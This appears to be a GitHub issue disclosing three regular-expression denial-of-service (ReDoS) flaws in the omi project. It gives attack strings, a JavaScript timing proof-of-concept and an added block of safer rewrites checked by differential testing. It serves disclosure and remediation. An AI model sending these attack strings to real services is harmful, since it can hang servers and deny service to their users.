Vulnerable Regular Expressions in omi
yetingli opened this issue
Type of Issue
Potential Regex Denial of Service (ReDoS)
Description
Here are three regular expressions with ReDoS vulnerabilities, as shown below.

regex1 = /( +)[^:]+::/
location
The ReDoS vulnerability of this regex is mainly due to the sub-pattern ( +)[^:]+
and can be exploited with the following string: " " * 5000
It took 44.0 seconds for regex1 to match the malicious string.

regex2 = /\bOBTW\s+[\s\S]*?\s+TLDR\b/
location
The ReDoS vulnerability of this regex is mainly due to the sub-pattern \s+[\s\S]*?\s+
and can be exploited with the following string: "OBTW" + " " * 5000
It took 44.6 seconds for regex2 to match the malicious string.

regex3 = /^(#{1,6})[ \t]*(.+?)[ \t]*#*\n+/
location1 location2
The ReDoS vulnerability of this regex is mainly due to the sub-pattern [ \t]*(.+?)[ \t]*
and can be exploited with the following string: "#" + " " * 5000
It took 51.4 seconds for regex3 to match the malicious string.
I prepared a script that showcases the execution times of the vulnerable regexes as follows.
// Runs one regex against an attack string that grows by one space per
// iteration and logs how long regex.test() takes every 100 characters,
// up to a length of 5000.
function measure(name, regex, seed) {
  console.log(name + ": " + regex);
  let attack_str = seed;
  for (let i = 1; i < 5000; i++) {
    attack_str = attack_str + " ";
    if (attack_str.length % 100 == 0) {
      const time = Date.now();
      regex.test(attack_str);
      const run_time = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + run_time + " ms");
    }
  }
}

// When attack_str.length=5000, it took 44.0 seconds
const regex1 = /( +)[^:]+::/;
measure("regex1", regex1, " ");

// When attack_str.length=5000, it took 44.6 seconds
const regex2 = /\bOBTW\s+[\s\S]*?\s+TLDR\b/;
measure("regex2", regex2, "OBTW");

// When attack_str.length=5000, it took 51.4 seconds
const regex3 = /^(#{1,6})[ \t]*(.+?)[ \t]*#*\n+/;
measure("regex3", regex3, "#");
I would suggest that you limit the input length, modify these regexes, or replace these regexes with other code.
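As an added example (this is not code from the issue author or from omi), the block below shows one way to act on the "modify these regexes" suggestion safely: for each of the three regexes it gives a rewrite that removes the overlapping quantifiers named above (`( +)` next to `[^:]+`, `\s+` on both sides of `[\s\S]*?`, and `[ \t]*`/`.+?`/`[ \t]*`/`#*`), then proves the rewrite returns the same `.test()` result as the original on every short string over a small alphabet before timing it on the issue's 5000-character attack strings. The rewrites, the alphabets and the enumeration lengths are my choices; the rewrites preserve only whether the regex matches, not the capture groups the originals expose, so they are a starting point for a fix rather than a drop-in replacement.

```javascript
// Added example, not omi's code: boolean-equivalent rewrites of the three
// regexes from this issue, checked by exhaustive differential testing against
// the originals and then timed on the issue's attack strings.
const cases = [
  {
    name: "regex1",
    original: /( +)[^:]+::/,
    // "( +)" and "[^:]+" both consume spaces. One literal space followed by
    // "[^:]+" accepts exactly the same strings (the extra spaces move into
    // "[^:]+") without the nested backtracking. The capture group is dropped.
    rewrite: / [^:]+::/,
    alphabet: [" ", ":", "a"],
    maxLen: 8,
    attack: " ".repeat(5000),
  },
  {
    name: "regex2",
    original: /\bOBTW\s+[\s\S]*?\s+TLDR\b/,
    // "\s+ [\s\S]*? \s+" is three overlapping quantifiers. A single "\s" on
    // each side accepts the same strings because "[\s\S]*" absorbs the rest.
    rewrite: /\bOBTW\s[\s\S]*\sTLDR\b/,
    alphabet: ["OBTW", "TLDR", " ", "\t", "x"], // tokens, not single chars
    maxLen: 5,
    attack: "OBTW" + " ".repeat(5000),
  },
  {
    name: "regex3",
    original: /^(#{1,6})[ \t]*(.+?)[ \t]*#*\n+/,
    // Space, tab and "#" are all matched by ".", so as a language
    // "[ \t]*(.+?)[ \t]*#*" is just ".+", and "\n+" is "\n" for a test().
    // Both capture groups (heading level and text) are dropped.
    rewrite: /^#{1,6}.+\n/,
    alphabet: ["#", " ", "a", "\n"],
    maxLen: 8,
    attack: "#" + " ".repeat(5000),
  },
];

// Enumerates every concatenation of 0..maxLen tokens from the alphabet.
function* allStrings(alphabet, maxLen, prefix = "") {
  yield prefix;
  if (maxLen === 0) return;
  for (const tok of alphabet) {
    yield* allStrings(alphabet, maxLen - 1, prefix + tok);
  }
}

// Differential test: returns the first enumerated string on which the original
// and the rewrite disagree, or null when they agree on all of them.
function findCounterexample(c) {
  for (const s of allStrings(c.alphabet, c.maxLen)) {
    if (c.original.test(s) !== c.rewrite.test(s)) return s;
  }
  return null;
}

// Milliseconds for a single regex.test(input).
function timeTest(regex, input) {
  const t0 = Date.now();
  regex.test(input);
  return Date.now() - t0;
}

// Summary for one case: equivalence verdict, number of inputs compared, and
// the rewrite's behaviour on the issue's 5000-character attack string.
function checkCase(c) {
  let count = 0;
  for (const _ of allStrings(c.alphabet, c.maxLen)) count++;
  return {
    name: c.name,
    equivalent: findCounterexample(c) === null,
    inputsCompared: count,
    rewriteMatchesAttack: c.rewrite.test(c.attack),
    rewriteMsOnAttack: timeTest(c.rewrite, c.attack),
  };
}

function checkAll() {
  return cases.map(checkCase);
}

for (const r of checkAll()) {
  console.log(`${r.name}: equivalent on ${r.inputsCompared} inputs = ${r.equivalent}, ` +
              `rewrite on the 5000-char attack string: ${r.rewriteMsOnAttack} ms`);
}
```

The originals are deliberately not run on the 5000-character strings here, since that is the 44 to 51 second case from the issue. Note that the rewrites for regex1 and regex2 are unanchored and can still take quadratic time on input with many candidate start positions (JavaScript has no atomic groups or possessive quantifiers), so the input length limit suggested above is still worth keeping; only the anchored regex3 rewrite is linear.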